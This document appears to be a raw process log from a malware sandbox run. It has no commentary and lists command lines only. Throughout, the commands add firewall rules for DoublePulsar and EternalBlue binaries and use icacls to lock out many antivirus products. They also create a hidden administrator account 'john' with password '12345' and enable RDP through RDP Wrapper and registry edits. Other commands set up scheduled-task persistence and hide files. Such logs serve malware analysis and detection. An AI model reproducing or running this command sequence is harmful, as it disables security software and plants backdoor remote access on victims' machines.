netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

C:\programdata\microsoft\intel\R8.exe

C:\programdata\microsoft\intel\R8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\ProgramData\Microsoft\Intel\winlog.exe

C:\ProgramData\Microsoft\Intel\winlog.exe -p123

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\ProgramData\Microsoft\Intel\winlogon.exe

"C:\ProgramData\Microsoft\Intel\winlogon.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FC5.tmp\5FC6.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6308,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\rdp\Rar.exe

"Rar.exe" e -p555 db.rar

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\ProgramData\RealtekHD\taskhostw.exe

C:\ProgramData\RealtekHD\taskhostw.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net.exe user "john" "12345" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user "john" "12345" /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Administrators" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Administradores" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\net.exe

net localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 5 /NOBREAK

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -w

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper\*.*"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\rdp"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=5184,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7112 /prefetch:1

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3 /NOBREAK

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=7996,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6940 /prefetch:1

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM 1.exe /T /F

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM P.exe /T /F

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=1220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=5488,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=3484,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

